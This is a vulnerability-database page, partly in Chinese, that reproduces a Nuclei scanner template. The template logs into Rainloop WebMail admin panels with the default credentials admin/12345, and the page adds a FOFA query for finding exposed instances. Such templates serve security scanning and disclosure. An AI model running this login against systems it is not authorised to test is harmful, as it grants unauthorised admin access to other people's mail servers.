rainloop-default-login: Rainloop WebMail - Default Admin Login

日期: 2025-08-01 | 影响软件: Rainloop WebMail | POC: 已公开

漏洞描述

Rainloop WebMail default admin login credentials were successful. fofa: app="RAINLOOP-WebMail"

PoC代码[已公开]

id: rainloop-default-login

info:
  name: Rainloop WebMail - Default Admin Login
  author: For3stCo1d
  severity: high
  description: Rainloop WebMail default admin login credentials were successful.
  reference:
    - https://github.com/RainLoop/rainloop-webmail/issues/28
  classification:
    cpe: cpe:2.3:a:rainloop:webmail:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: rainloop
    product: webmail
    fofa-query: app="RAINLOOP-WebMail"
  tags: default-login,rainloop,webmail,foss,vuln

http:
  - raw:
      - |
        GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /?/Ajax/&q[]=/0/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - 12345

    extractors:
      - type: regex
        name: token
        internal: true
        group: 1
        regex:
          - 'token":"(.+?)"'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"Action":"AdminLogin"'
          - '"Result":true'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ee6e9e529fa922696a23ff6932b2f3e211b7c8cbc982ad31b68da061b7523cb50220457d37a4df2b9f3aa7f8e2fa11dcc32598dc48b7e3856bee4695fca2ad20fb07:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/rainloop/rainloop-default-login.yaml